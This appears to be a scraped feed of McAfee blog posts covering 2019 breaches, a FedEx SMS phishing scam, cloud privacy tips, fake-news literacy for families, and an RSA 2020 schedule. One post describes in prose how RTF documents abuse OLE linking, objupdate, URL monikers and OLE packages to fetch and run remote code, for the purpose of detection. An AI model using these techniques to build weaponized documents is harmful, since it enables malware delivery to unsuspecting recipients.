Last January, we met Collection #1, a monster data set that exposed 772,904,991 unique email addresses and over 21 million unique passwords. Security researcher Troy Hunt first discovered this data set on the popular cloud service MEGA, specifically uncovering a folder holding over 12,000 files. Due to the sheer volume of the breach, the data was likely comprised of multiple breaches. When the storage site was taken down, the folder was then transferred to a public hacking site, available for anyone to take for free.

Verifications.io breach

Less than two months after Collection #1, researchers discovered a 150-gigabyte database containing 809 million records exposed by the email validation firm Verifications.io. This company provides a service for email marketing firms to outsource the extensive work involved with validating mass amounts of emails. This service also helps email marketing firms avoid the risk of having their infrastructure blacklisted by spam filters. Therefore, Verifications.io was entrusted with a lot of data, creating an information-heavy database complete with names, email addresses, phone numbers, physical addresses, gender, date of birth, personal mortgage amounts, interest rates, and more.

Orvibo breach

In mid-June, Orvibo, a smart home platform designed to help users manage their smart appliances, left an Elasticsearch server (a highly scalable search and analytics engine that allows users to store, search, and analyze big volumes of data in real-time) online without password protection. The exposure left at least two billion log entries each containing customer data open to the public. This data included customer email addresses, the IP address of the smart home devices, Orvibo usernames, and hashed passwords, or, unreadable strings of characters that are designed to be impossible to convert back into the original password.

What Users Can Learn From Data Breaches

Data breaches serve as a reminder that users and companies alike should do everything in their power to keep personal information protected. As technology continues to become more advanced, online threats will also evolve to become more sophisticated. So now more than ever, it’s imperative that users prioritize the security of their digital presence, especially in the face of massive data leaks. If you think you might have been affected by a data breach or want to take the necessary precautions to safeguard your information, follow these tips to help you stay secure:

  • Research before you buy.Although you might be eager to get the latest new device, some are made more secure than others. Look for devices that make it easy to disable unnecessary features, update software, or change default passwords. If you already have an older device that lacks these features, consider upgrading.
  • Be vigilant when monitoring your personal and financial data. A good way to determine whether your data has been exposed or compromised is to closely monitor your online accounts. If you see anything fishy, take extra precautions by updating your privacy settings, changing your password, or using two-factor authentication.
  • Use strong, unique passwords. Make sure to use complex passwords for each of your accounts, and never reuse your credentials across different platforms. It’s also a good idea to update your passwords consistently to further protect your data.
  • Enable two-factor authentication. While a strong and unique password is a good first line of defense, enabling app-based two-factor authentication across your accounts will help your cause by providing an added layer of security.
  • Use a comprehensive security solution. Use a solution like McAfee Total Protection to help safeguard your devices and data from known vulnerabilities and emerging threats.

Stay Up to Date

To stay on top of McAfee news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Security Lessons From 2019’s Biggest Data Breaches appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/2019-data-breaches/feed/ 0
What You Need to Know About the FedEx SMiShing Scam https://www.mcafee.com/blogs/consumer/consumer-threat-notices/fedex-sms-phishing-scam/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/fedex-sms-phishing-scam/#comments Wed, 29 Jan 2020 00:59:53 +0000 /blogs/?p=98330

You receive a text message saying that you have a package out for delivery. While you might feel exhilarated at first, you should think twice before clicking on that link in the text. According to CNN, users across the U.S. are receiving phony text messages claiming to be from FedEx as part of a stealthy […]

The post What You Need to Know About the FedEx SMiShing Scam appeared first on McAfee Blogs.

]]>

You receive a text message saying that you have a package out for delivery. While you might feel exhilarated at first, you should think twice before clicking on that link in the text. According to CNN, users across the U.S. are receiving phony text messages claiming to be from FedEx as part of a stealthy SMS phishing (SMiShing) campaign.

How SMiShing Works

This SMiShing campaign uses text messages that show a supposed tracking code and a link to “set delivery preferences.” The link directs the recipient to a scammer-operated website disguised as a fake Amazon listing. The listing asks the user to take a customer satisfaction survey. After answering a couple of questions, the survey asks the user to enter personal information and a credit card number to claim a free gift, which still requires a small shipping and handling fee. But according to HowtoGeek.com, agreeing to pay the small shipping fee also signs the user up for a 14-day trial to the company that sells the scam products. After the trial period, the user will be billed $98.95 every month. What’s more, the text messages use the recipient’s real name, making this threat even stealthier.

How to Stay Protected

So, what can online shoppers do to defend themselves from this SMiShing scam? Check out the following tips to remain secure:

  • Be careful what you click on. Be sure to only click on links in text messages that are from a trusted source. If you don’t recognize the sender, or the SMS content doesn’t seem familiar, stay cautious and avoid interacting with the message.
  • Go directly to the source. FedEx stated that it would never send text messages or emails to customers that ask for money or personal information. When in doubt about a tracking number, go to the main website of the shipping company and search the tracking number yourself.
  • Enable the feature on your mobile device that blocks texts from the Internet. Many spammers send texts from an Internet service in an attempt to hide their identities. Combat this by using this feature to block texts sent from the Internet.
  • Use mobile security software. Make sure your mobile devices are prepared any threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.

To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post What You Need to Know About the FedEx SMiShing Scam appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/fedex-sms-phishing-scam/feed/ 1
Top 10 Cloud Privacy Recommendations for Consumers https://www.mcafee.com/blogs/enterprise/cloud-security/top-10-cloud-privacy-recommendations-for-consumers/ https://www.mcafee.com/blogs/enterprise/cloud-security/top-10-cloud-privacy-recommendations-for-consumers/#respond Tue, 28 Jan 2020 15:00:15 +0000 /blogs/?p=98303

It’s Data Privacy Day and when it comes down to it, most of us don’t know exactly how many organizations have our data—let alone how it’s being collected or what it is being used for. Unfortunately, the stakes are higher than ever for those who are unwilling to take appropriate safeguards to defend their personal […]

The post Top 10 Cloud Privacy Recommendations for Consumers appeared first on McAfee Blogs.

]]>

It’s Data Privacy Day and when it comes down to it, most of us don’t know exactly how many organizations have our data—let alone how it’s being collected or what it is being used for. Unfortunately, the stakes are higher than ever for those who are unwilling to take appropriate safeguards to defend their personal data, including identity theft, financial loss, and more.

While the cloud presents a wealth of opportunity for increased productivity, connectivity and convenience, it also requires a new set of considerations for ensuring safe use. There are many, but here are the top ten:

1. Don’t reuse passwords.

Password reuse is a common problem, especially in consumer cloud services. If you reuse passwords, you only need one of your cloud services to be breached—once criminals have stolen your credentials through one service, they potentially have access to every account that shares those same credentials, including banking platforms, email and other services where sensitive data is stored. When using a cloud service for the first time, it’s easy to think that if the data you are using in that particular service isn’t confidential, then it doesn’t matter if you use your favorite password. But a good way to think of it is this:  Many passwords, one breach. One password…. (potentially) many breaches. If you’re concerned about being able to remember them, look into obtaining a password manager.

2. Don’t share folders, share files

Many cloud services allow collaboration or file sharing. If you only want to share a few files, share those and not a complete folder. It’s all too easy to over-share without realizing what else is in the folder—or to forget who you shared it with (or that you shared it at all!) and later add private files that were never meant to be disseminated.

3. Be careful with auto-sync (it could bring in malware)

If you share a folder with someone else, many cloud services provide auto-sync, so that when another user adds new files, they get synced to everyone in the share. The danger here is that if someone you are sharing with gets infected by malware, this malware could be uploaded to the cloud and downloaded to your devices automatically.

4. Be careful of services that ask for your data

When logging into a new service, you may be asked for some personal data; for example, your date of birth. Why should they ask, and what will they do with this information?  If they can tie that to your email address, and another service obtains your zip-code and a third service asks for your mobile number, you can see that anyone collating that information could have enough to try to steal your identity. If there’s no reason why a service should have that data, use a different service (or, at least, give them incorrect information).

5. Read EULA & privacy policies – who owns the data?

I know this sounds hard, but it is worth it: Does the cloud provider claim that they own the data you upload? This may give them the right, or at least enough rights in their own mind, to sell your data to data brokers. This is more common than you think—you should never use a service that claims it owns your data.

6. Think twice about mobile apps and their data collection

Many cloud services have a mobile app as a way to access their service. Before using a mobile app, look at the data it says it will collect. Often the app collects more data than would be collected if you were to access the service via browser.

7. If unsure, ask your IT department if they have reviewed the service.

Some organizations’ IT departments will have already reviewed a cloud service and decided if it is acceptable for corporate use. It’s in their interest to keep their users secure, especially as so many devices now contain both personal and business data. Ask them if they have reviewed a service before you access it.

8. Don’t use public Wi-Fi hotspots without using a VPN for encryption.

Public Wi-Fi can be a place for data interception. Always use a VPN or encryption technology to ensure data is encrypted between your device and cloud services when on a public Wi-Fi.

9. Enable multi-factor authentication.

Cloud services that are well designed will offer additional security services, such as multi-factor authentication. Use those, and any other security features that you can.

10. Don’t share accounts with friends and family.

It’s often second nature to share with our friends and family. But are they as concerned about privacy as you are? Don’t share accounts, otherwise if they let their guard drop, your data could be compromised.

Check out more ways to take action and protect your data. 

Take a look at our additional resource for safeguarding your personal data in the cloud . 

The post Top 10 Cloud Privacy Recommendations for Consumers appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/cloud-security/top-10-cloud-privacy-recommendations-for-consumers/feed/ 0
Take Action This Data Privacy Day https://www.mcafee.com/blogs/consumer/consumer-threat-notices/data-privacy-day-2020/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/data-privacy-day-2020/#respond Tue, 28 Jan 2020 14:00:26 +0000 /blogs/?p=98291

We all know that data breaches have been on the rise, and hackers are finding clever, new ways to access our devices and information. But sometimes it takes a little push to get us to take action when it comes to protecting our most sensitive information. That’s why this Data Privacy Day, on January 28th, […]

The post Take Action This Data Privacy Day appeared first on McAfee Blogs.

]]>

We all know that data breaches have been on the rise, and hackers are finding clever, new ways to access our devices and information. But sometimes it takes a little push to get us to take action when it comes to protecting our most sensitive information. That’s why this Data Privacy Day, on January 28th, we have the perfect opportunity to own our privacy by taking the time to safeguard data, and help others do the same.

After all, there are now roughly four billion consumers connected online, living various moments of truth that could potentially put them at risk. From sharing photos and socializing with friends, to completing bank transactions—people expect to do what they desire online whenever and wherever they want. But as the saying goes, “with great power comes great responsibility”, and it is imperative that consumers take accountability, not just by enjoying the advantages of connecting online, but by protecting their online identities, too.

Remember, your personal information and online presence are as valuable as money, and what you post online can last a lifetime. Data Privacy Day is a reminder for everybody to make sure that they are protecting what matters most to them: their personal data, as well as their families and friends.

So, let’s get started. Even if you have a large online footprint, protecting this information doesn’t have to be overwhelming.

Here are a few tips:

Update your privacy and security settings—Begin with the websites and applications that you use the most. Check to see if your accounts are marked as private, or if they are open to the public. Also, look to see if your data is being leaked to third parties. You want to select the most secure settings available, while still being able to use these tools correctly.  Here’s a guide from StaySafeOnline to help you get started.

Start the New Year with a new digital you— When opening new online accounts for sharing personal information such as your email address or date of birth, create a new digital persona that has alternative answers that only you would know. This will limit online tracking of your real personal information.

Lockdown your logins—At the same time, secure your logins by making sure that you are creating long and unique passphrases for all of your accounts. Use multi-factor identification, when available. This is a security protocol that takes more than just one step to validate your login, such as a password and a code sent to your mobile device, or a fingerprint. It is exponentially more secure than a simple password.

Spread the word and get involved— Once you have done your own privacy check, help others do the same. It’s important that we all feel empowered to protect our privacy, so share the safety tips in this article with your family, coworkers, and community. Here are some helpful resources to create privacy awareness where you live.

Protect your family and friends – If you are a parent, you can make a big difference by helping raise privacy-savvy kids. After all, today’s kids represent the future of online security. If they start building their digital footprints with solid safety habits, it makes all of us more secure.

Begin with this handy tip sheet.

Own your information—It’s time for everyone to feel empowered to own their information. While there will always be online threats, you can minimize any potential harm by committing yourself to the action steps we listed above. Once you have, spread the word by using the hashtag #privacyaware on Twitter, Instagram, or Facebook.

Let’s make this 12th annual international Data Privacy Day the most effective ever! Stay up to date with all the event happenings, here, and keep informed year-round on the latest threats and security tips.

The post Take Action This Data Privacy Day appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/data-privacy-day-2020/feed/ 0
Data Goes Supernova: Exploring Security at the Cloud Edge https://www.mcafee.com/blogs/enterprise/cloud-security/data-goes-supernova-exploring-security-at-the-cloud-edge/ https://www.mcafee.com/blogs/enterprise/cloud-security/data-goes-supernova-exploring-security-at-the-cloud-edge/#respond Tue, 28 Jan 2020 05:01:12 +0000 /blogs/?p=98287

Modern enterprises are fueled by data. The force of the cloud has been like gravity in a supernova, causing data to explode outward and disperse forever. No longer constrained by the network, the free flow of data to cloud service providers and a wide range of devices fragments visibility and control for enterprise security. In […]

The post Data Goes Supernova: Exploring Security at the Cloud Edge appeared first on McAfee Blogs.

]]>

Modern enterprises are fueled by data. The force of the cloud has been like gravity in a supernova, causing data to explode outward and disperse forever. No longer constrained by the network, the free flow of data to cloud service providers and a wide range of devices fragments visibility and control for enterprise security.

In our latest study on cloud adoption and risk, we traverse the paths of enterprise data as it disperses beyond the network perimeter. Through this research, which combines survey results from 1,000 enterprises in 11 countries and anonymized event data from 30 million enterprise cloud users, we are able to uncover the new areas of risk every enterprise must address in our cloud-first world.

To jump in now, download the full report here: Enterprise Supernova: The Data Dispersion Cloud Adoption and Risk Report.

In the report we evaluate three areas of context that together address the dispersion of data to the cloud:

  1. Cloud context: Data protection must understand the creation and flow of data within the cloud, through collaboration and inter-cloud sharing.

Twelve percent of files shared in the cloud contain sensitive data, an increase of 57% year over year.

  1. Device context: IT needs the ability to understand whether it is a personal device or one which they control accessing sensitive data. Data loss to personal, unmanaged devices cannot be remediated.

Only 41% of companies can control personal device access to their data in the cloud.

  1. Web context: The continuous expanse of cloud services is impossible to predict, requiring rules that manage access through web before reaching an unknown cloud destination.

C-Level IT leaders see the risk of “Shadow IT,” while manager-level decision makers are less likely to report risk to their data from unsanctioned applications.

This is just a preview of the findings in this study. For the full story, download the entire report here: Enterprise Supernova: The Data Dispersion Cloud Adoption and Risk Report.

The post Data Goes Supernova: Exploring Security at the Cloud Edge appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/cloud-security/data-goes-supernova-exploring-security-at-the-cloud-edge/feed/ 0
Where’s the Truth Online? How to Build Your Family’s Digital Discernment https://www.mcafee.com/blogs/consumer/family-safety/wheres-the-truth-online-building-up-your-familys-digital-discernment/ https://www.mcafee.com/blogs/consumer/family-safety/wheres-the-truth-online-building-up-your-familys-digital-discernment/#respond Sat, 25 Jan 2020 15:00:53 +0000 /blogs/?p=98239 fake news

Note: This is Part I of a series on equipping your family fight back against fake news online.  Fake news is chipping away at our trust in the government, the media, and in one another. And, because our kids spend much so much time in the online space, it’s more important than ever to help […]

The post Where’s the Truth Online? How to Build Your Family’s Digital Discernment appeared first on McAfee Blogs.

]]>
fake news

Note: This is Part I of a series on equipping your family fight back against fake news online. 

Fake news is chipping away at our trust in the government, the media, and in one another. And, because our kids spend much so much time in the online space, it’s more important than ever to help them understand how to separate truth from fiction.

How dangerous is the spread of misinformation? According to one study, 75% of people who see fake news believe it’s real. This inability to discern is at the core of how a false piece of information — be it a story, a photo, a social post, or an email — spreads like wildfire online.

Fake news erodes trust

A 2019 Pew Institute study reveled Americans rank fake news as a bigger problem in the U.S. over terrorism, illegal immigration, racism, and sexism and believe the spread of fake news is causing ‘significant harm’ to the nation and needs to be stopped.’

At the root of the issue is that too much news is coming at us from too many sources. True or not, millions of people are sharing that information, and they are often driven more by emotion and than fact.

According to Author and Digital Literacy Expert Diana Graber, one of a parent’s most important roles today is teaching kids to evaluate and be discerning with the content they encounter online.

“Make sure your kids know that they cannot believe everything they see or read online. Give them strategies to assess online information. Be sure your child’s school is teaching digital literacy,” says Graber.

Kids encounter and share fake news on social networks, chat apps, and videos. Says Graber, the role of video will rise as a fake news channel as AI technology advances.

“I think video manipulation, such as deepfake videos, is a very important area to keep an eye on for in the future. So much of the media that kids consume is visual, it will be important for them to learn visual literacy skills too,” says Graber.

The hidden costs of fake news

A December Facebook post warning people that men driving white vans were part of an organized human trafficking ring, quickly went viral on several social networks.

Eventually, law enforcement exposed the post as fake; people shrugged it off and moved on. But in its wake, much was lost that didn’t go viral. The fake post was shared countless times. With each share, someone compromised a small piece of trust.

The false post caused digital panic and cast uncertainty on our sense of security and community. The post cost us money. The false information took up the resources of several law enforcement agencies that chose to investigate. It cost us trust. Public warnings even made it to the evening news in some cities.

The spread of fake news impacts on our ability to make wise informed decisions. It chips away at our expectation of truth in the people and resources around us.

Fake news that goes viral is powerful. It can impact our opinions about important health issues. It can damage companies and the stock market, and destroy personal reputations.

In the same Pew study, we learned about another loss — connection. Nearly 54 percent of respondents said they avoid talking with another person because that person may bring made-up news into the conversation.

The biggest loss? When it’s hard to see the truth, we are all less well informed, which creates obstacles to personal and cultural progress.

Family talking points

Here are three digital literacy terms defined to help you launch the fake news discussion.

  1. Fake news: We like the definition offered by PolitiFact: “Fake news is made-up stuff, masterfully manipulated to look like credible journalistic reports that are easily spread online to large audiences willing to believe the fictions and spread the word.”Discuss: Sharing fake news can hurt the people in the story as well as the credibility of the person sharing it. No one wants to be known for sharing sketchy content, rumors, or half-truths.Do: Sit down with your kids. Scroll through their favorite social networks and read some posts or stories. Ask: What news stories spark your interest, and why? Who posted this information? Are the links in the article credible? Should I share this piece of content? Why or why not? 
  2. Objectivity: Content or statements based on facts that are not influenced by personal beliefs or feelings.Discuss: News stories should be objective (opinion-free), while opinion pieces can be subjective. When information (or a person) is subjective, you can identify personal perspectives, feelings, and opinions. When information (or a person) is objective, it’s void of opinion and based on facts.Do: Teaching kids to recognize objective vs. subjective content can be fun. Pick up a local newspaper (or access online). Read the stories on the front page (they should contain only facts). Flip to the Op-Ed page and discuss the shift in tone and content.
  3. Discernment: A person’s ability to evaluate people, content, situations, and things well. The ability to discern is at the core of decision-making.Discuss: To separate truth from fiction online, we need to be critical thinkers who can discern truth. Critical thinking skills develop over time and differ depending on the age group.Do: Watch this video from Cyberwise on Fake News. Sit down together and Google a current news story. Compare how different news sites cover the same news story. Ask: How are the headlines different? Is there a tone or bias? Which story do you believe to be credible, and why? Which one would you feel confident sharing with others? 

The increase in fake news online has impacted us all. However, with the right tools, we can fight back and begin to restore trust. Next week, in Part II of this series, we’ll discuss our personal responsibility in the fake news cycle and specific ways to identify fake news.

The post Where’s the Truth Online? How to Build Your Family’s Digital Discernment appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/wheres-the-truth-online-building-up-your-familys-digital-discernment/feed/ 0
An Inside Look into Microsoft Rich Text Format and OLE Exploits https://www.mcafee.com/blogs/other-blogs/mcafee-labs/an-inside-look-into-microsoft-rich-text-format-and-ole-exploits/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/an-inside-look-into-microsoft-rich-text-format-and-ole-exploits/#respond Fri, 24 Jan 2020 18:09:03 +0000 /blogs/?p=98259

There has been a dramatic shift in the platforms targeted by attackers over the past few years. Up until 2016, browsers tended to be the most common attack vector to exploit and infect machines but now Microsoft Office applications are preferred, according to a report published here during March 2019. Increasing use of Microsoft Office […]

The post An Inside Look into Microsoft Rich Text Format and OLE Exploits appeared first on McAfee Blogs.

]]>

There has been a dramatic shift in the platforms targeted by attackers over the past few years. Up until 2016, browsers tended to be the most common attack vector to exploit and infect machines but now Microsoft Office applications are preferred, according to a report published here during March 2019. Increasing use of Microsoft Office as a popular exploitation target poses an interesting security challenge. Apparently, weaponized documents in email attachments are a top infection vector.

Object Linking and Embedding (OLE), a technology based on Component Object Model (COM), is one of the features in Microsoft Office documents which allows the objects created in other Windows applications to be linked or embedded into documents, thereby creating a compound document structure and providing a richer user experience. OLE has been massively abused by attackers over the past few years in a variety of ways. OLE exploits in the recent past have been observed either loading COM objects to orchestrate and control the process memory, take advantage of the parsing vulnerabilities of the COM objects, hide malicious code or connecting to external resources to download additional malware.

Microsoft Rich Text Format is heavily used in the email attachments in phishing attacks. It has been gaining massive popularity and its wide adoption in phishing attacks is primarily attributed to the fact that it has an ability to contain a wide variety of exploits and can be used efficiently as a delivery mechanism to target victims. Microsoft RTF files can embed various forms of object types either to exploit the parsing vulnerabilities or to aid further exploitation. The Object Linking and Embedding feature in Rich Text Format files is largely abused to either link the RTF document to external malicious code or to embed other file format exploits within itself and use it as the exploit container. Apparently, the RTF file format is very versatile.

In the below sections, we attempt to outline some of the exploitation and infection strategies used in Microsoft Rich Text format files over the recent past and then towards the end , we introspect on the key takeaways that can help automate the analysis of RTF exploits and set the direction for the generic analysis approach.

RTF Control Words

Rich Text Format files are heavily formatted using control words. Control words in the RTF files primarily define the way the document is presented to the user. Since these RTF control words have the associated parameters and data, parsing errors for them can become a target for exploitation. Exploits in the past have been found using control words to embed malicious resources as well. Consequently, it becomes significant to examine a destination control word that consumes data and extract the stream. RTF specifications describe several hundred control words consuming data.

RTF parsers must also be able to handle the control word obfuscation mechanisms commonly used by attackers, to further aid the analysis process. Below is one of the previous instances’ exploits using control word parameters to introduce executable payloads inside the datastore control word.

Overlay Data in RTF Files

Overlay data is the additional data which is appended to the end of RTF documents and is predominantly used by exploit authors to embed decoy files or additional resources, either in the clear, or encrypted form which is usually decrypted when the attacker-controlled code is executed. Overlay data of the volume beyond a certain size should be deemed suspicious and must be extracted and analysed further. However, Microsoft Word RTF parser will ignore the overlay data while processing RTF documents. Below are some instances of RTF exploits with a higher volume of overlay data appended at the end of the file, with CVE-2015-1641 embedding both the decoy document and multi-staged shellcodes with markers.

Object Linking and Embedding in RTF Files

Linked or embedded objects in RTF documents are represented as RTF objects, precisely to the RTF destination control word “object”. The data for the embedded or linked object is stored as the parameter to the RTF sub-destination control word “objdata” in the hex-encoded OLESaveToStream format. Modifier control word “objclass” determines the type of the object embedded in the RTF files and helps the client application to render the object. However, the hex encoded object data as the argument to the “objdata” control word can also be heavily obfuscated, either to make the reverse engineering and analysis effort more time consuming or to break the immature RTF parsers. Apparently, OLE has been one of the dominant attack vectors in the recent past, with many instances of OLE based exploits used in targeted attacks, essentially implying robust RTF document parsers for the extraction of objects, along with deeper inspection of object data is extremely critical.

Object Linking – Linking RTF to External Resource

Using object linking, it is possible to link the RTF files to the remote object which could be the link to the malicious resource hosted on the remote server. This leads the resulting RTF file to behave as a downloader and subsequently execute the downloaded resource by invoking the registered application-specific resource handlers. Inspecting the modifier RTF control words to “object”, linked objects are indicated by another nested control word “objautlink”, as represented below in the RTF document.

As indicated in the above representation, object data as the argument to the RTF control word “objdata” is OLE1.0NativeStream in the OLESaveToStream format which is followed by the NativeDataSize indicating the size of the OLE2.0 Compound document that is wrapped in the NativeStream. As per the Rich Text Format specifications, if the object is linked to the container application, which in this case is the RTF document, the Root Storage directory entry of the compound document will have the CLSID of the StdOleLink indicating the linked object. Also, when the object is in the OLE2.0 format, the linked source data is specified in the MonikerStream of the OLESteam structure. As highlighted below, while parsing the object data, the ole32.OleConvertOLESTREAMToIStorage function is responsible for converting the OLE1.0 NativeStream data to OLE2.0 structured storage format. Following the pointer to the OLE stream lpolestream will allow us to visualize the parsed extracted native data. Below is a memory snapshot from when an RTF document with a linked object was parsed by the winword.exe process.

Launching the RTF document with the link to external object will throw up a dialogue box asking to update the data from the linked object, as shown below.

However, this is not the ideal exploitation strategy to target victims. This error can be eliminated by inserting another modifier control word “objupdate”, which internally calls link object’s IOleObject::Update method to update the link’s source.

Subsequently the urlmon.dll, which is the registered server for the URL Moniker, is instantiated.

Once the COM object is instantiated, the connection is initiated to the external resource and, based on the content-type header returned by the server in the response, URL Moniker consults the Mime database in the registry and invokes registered application handlers.

Details on how URL Moniker is executed and an algorithm to determine which appropriate handlers to invoke is described by Microsoft here.  We have had multiple such RTF exploits in the past including CVE-2017-0199, CVE-2017-8756 and others using Monikers to download and execute remote code.

However, COM objects used in the mentioned exploits had been blacklisted by Microsoft in the newer versions, but similar techniques could be used in future which essentially necessitates the analysis of OLE structured storage streams.

Object Embedding – RTF Containing OLE Controls

As indicated earlier, embedded objects are represented in the container documents in the OLE2 format. When the object is stored in the OLE2 format, the container application (here Rich Text Format files) creates the OLE Compound File Storage for each of the objects embedded and the respective object data is stored in the OLE Compound File Stream Objects. Layout of the container documents storing embedded objects is as represented below and described in the Microsoft documentation here.

RTF exploits historically have been found embedding and loading multiple OLE controls in order to bypass exploit mitigations and to take advantage of memory corruption vulnerabilities by loading vulnerable OLE controls. Embedded OLE controls in the RTF document are usually indicated by nested control word “objocx” or “objemb” followed by the “objclass” with the argument as the name of the OLE control to render the object. Below is one of the examples of the previous exploit used in the targeted attacks, which exploited a vulnerability in the COM object and loaded another OLE control to aid the exploitation process which had the staged malicious code embedded. Apparently, it is critical to extract this object data, extract the OLE2 compound file storage and extract each of the stream objects for further inspection of hidden malicious shellcodes.

Object Embedding – RTF Containing Other Documents

Malicious RTF documents can use the OLE functionality to embed other file formats like Flash files and Word documents, either to exploit respective file format vulnerabilities or to further assist and set up the stage for the successful exploitation process. Multiple RTF exploits have been observed in the past embedding OOXML documents using OLE functionality to manipulate the process heap memory and bypass Windows exploit mitigations. In RTF files, embedded objects are usually indicated by nested control word “objemb” with a version-dependent “ProgID” string as the argument to the nested control word “objclass”. One such RTF exploit used in targeted attacks in the recent past, is as indicated below.

Below is another instance where the PDF file was physically embedded within the compound document. As mentioned, the embedded object is stored physically along with all the information required to render it.

In the embedded object, the creating application’s identifier is stored in the CLSID field of the compound file directory entry of the CFB storage object. If we take a look at the previous instance, when the object data is extracted and inspected manually, the following CLSID is observed in the CFB storage object, which corresponds to the CLSID_Microsoft_Word_Document.

When OLE2 stream objects are parsed and the embedded OOXML is extracted and analysed after deflating the contents, we see the suspicious ActiveX object loading activity and embedded malicious code in one of the binary files. Apparently, it is significant to extract the embedded files in RTF and perform further analysis.

OLE Packages in RTF Files

RTF documents can also embed other file types like scripts (VBSsript, JavaScript, etc.), XML files and executables via OLE packages. An OLE package in an RTF file is indicated by the ProgID string “package” as the argument to the nested control word “objclass”. Packager format is the legacy format that does not have an associated OLE server. Looking at the associated CLSID in the registry, there is no specific data format mapped with Packages.

This essentially implies that OLE packages can store multiple file types and, if a user clicks the object, it will lead to execution of it and, eventually, infection of the machine if they are malicious scripts. RTF documents have been known to deliver malware by embedding scripts via OLE packages and then using Monikers, as described in the previous sections, to drop files in the desired directory and then execute them. One such instance of a malicious RTF document exploiting CVE-2018-0802, embedding an executable file, is shown below.

Since many RTF documents have been found delivering malware via OLE packages, it is critical to look for these embedded objects and analyse them for such additional payloads. Embedded executables / scripts within RTF could be malicious. Looking for OLE packages and extracting embedded files should be a trivial task.

The above exploit delivery strategies can allow us to take a step towards building analysis frameworks for RTF documents. Primarily, inspecting the linked or embedded objects turns out to be the critical aspect of automated analysis tasks along with the RTF control words inspection. The following are the key takeaways:

  • Using the RTF file as the container, many other file format exploits can be embedded inside using the Object Linking and Embedding feature, essentially weaponizing the RTF documents.
  • Extract and analysing embedded or linked objects for malicious code, payload or resource handler invocations becomes very essential.
  • If RTF document has a higher volume of appended data, it must be further looked at.
  • Non-OLE control words and OLE packages must also be analysed for any malicious content.

McAfee Response

As Microsoft Office vulnerabilities continue to surface, generic inspection methods will have to be improved and enhanced, consequently leading to better detection results. As a reminder, the McAfee Anti-Malware engine used on all our endpoints and most of our appliances has the potential to unpack Office, RTF and OLE documents, expose the streams of content and unpack these streams if necessary.

The post An Inside Look into Microsoft Rich Text Format and OLE Exploits appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/an-inside-look-into-microsoft-rich-text-format-and-ole-exploits/feed/ 0
RSA 2020 – See You There! https://www.mcafee.com/blogs/enterprise/rsa-2020-see-you-there/ https://www.mcafee.com/blogs/enterprise/rsa-2020-see-you-there/#respond Thu, 23 Jan 2020 21:40:44 +0000 /blogs/?p=98240

It’s that time of year again—security companies are starting to gear up for the RSA Conference in San Francisco’s Moscone Center. Known as one of the world’s largest security conferences, RSA attracts around 42,000 attendees, including 700 speakers, and hosts more than 550 sessions. This year, RSA organizers are adding a new element for attendees […]

The post RSA 2020 – See You There! appeared first on McAfee Blogs.

]]>

It’s that time of year again—security companies are starting to gear up for the RSA Conference in San Francisco’s Moscone Center. Known as one of the world’s largest security conferences, RSA attracts around 42,000 attendees, including 700 speakers, and hosts more than 550 sessions. This year, RSA organizers are adding a new element for attendees to enjoy called the “Engagement Zone,” a networking space designed to inspire attendees with an interactive, collaborative and cooperative learning space.

This year’s RSA Conference theme is the “Human Element.” With new technologies, strategies and AI being employed by both security pros and threat actors, one thing remains constant: us. We are the Human Element within cybersecurity. Here at McAfee, we couldn’t agree more. McAfee’s Senior Principal Engineer and Chief Data Scientist, Celeste Fralick, said, “While the possibilities with AI seem endless, the idea that they could eliminate the role of humans in cybersecurity departments is about as farfetched as the idea of a phalanx of Baymaxes replacing the country’s doctors.” According to Celeste, AI and humans have equally important roles in cybersecurity. “There are tasks that humans currently excel at that AI could potentially perform someday. But these tasks are ones that humans will always have a sizable edge in, or are things AI shouldn’t be trusted with.”

Whether you’re a seasoned veteran or a first-time attendee at RSA, you should sketch out a game plan of the sessions and booths you want to visit before making your way into the city.

Join McAfee at RSA 2020

CSA Summit Keynote: Case Study: Obvious and Not-So Obvious Lessons Learned On the Path to Cloud-First IT

Monday, February 24 | 1:00pm – 1:20pm| Moscone Center

Land O’ Lakes operates a global dairy and agriculture co-operative across 60 countries with thousands of distributed employees. The demands of global business once required highly complex applications running in their private data centers, but are now met with increased velocity and better security in the public cloud. How did they do it? Hear from Land O’ Lakes CISO Tony Taylor and McAfee SVP of Cloud Security Rajiv Gupta as they share lessons learned along the journey to cloud-first IT at Land O’ Lakes, including new requirements for cloud-native security controls and the evolution to a cloud-edge architecture that has replaced their former network.

Keynote: Time to Tell

Tuesday, February 25 |8:35am – 8:55am | RSA West Stage | Session Code: KEY-T03W

Cyber defenses from a generation ago linger front and center, even as quantum computing will reshape the digital world. Steve Grobman makes the case it’s time to move beyond intelligence.

Session: Inside the Takedown of the Rubella Macro Builder Suspect

Tuesday, February 25 | 1:00pm – 1:50pm | Moscone South | Session Code: PART1-T10

During this session, the McAfee Advanced Threat Research lead investigator will explain some of the details the team found that helped unmask the suspected actor behind the Rubella Macro Builder. These details were shared with law enforcement and proved to be crucial in its investigation.

Session: Emerging Threats: Deep Fakes are Getting Terrifyingly Real – How Can We Spot Them?

Monday, February 24 | 3:05pm – 3:35pm | Moscone West | Session Code: SEM-M03

This seminar will provide a full day of focus on emerging threats such as ransomware, targeted attacks, emerging IoT threats, and new aspects of social engineering and deep fake human manipulation. Sessions get inside the minds and motivations.

Session: Reproducibility: The Life and Risks of a Model

Tuesday, February 25 | 2:20pm – 3:10pm | Moscone West, Classroom: MLAI1-R09 | Session Code: MLAI1-R09

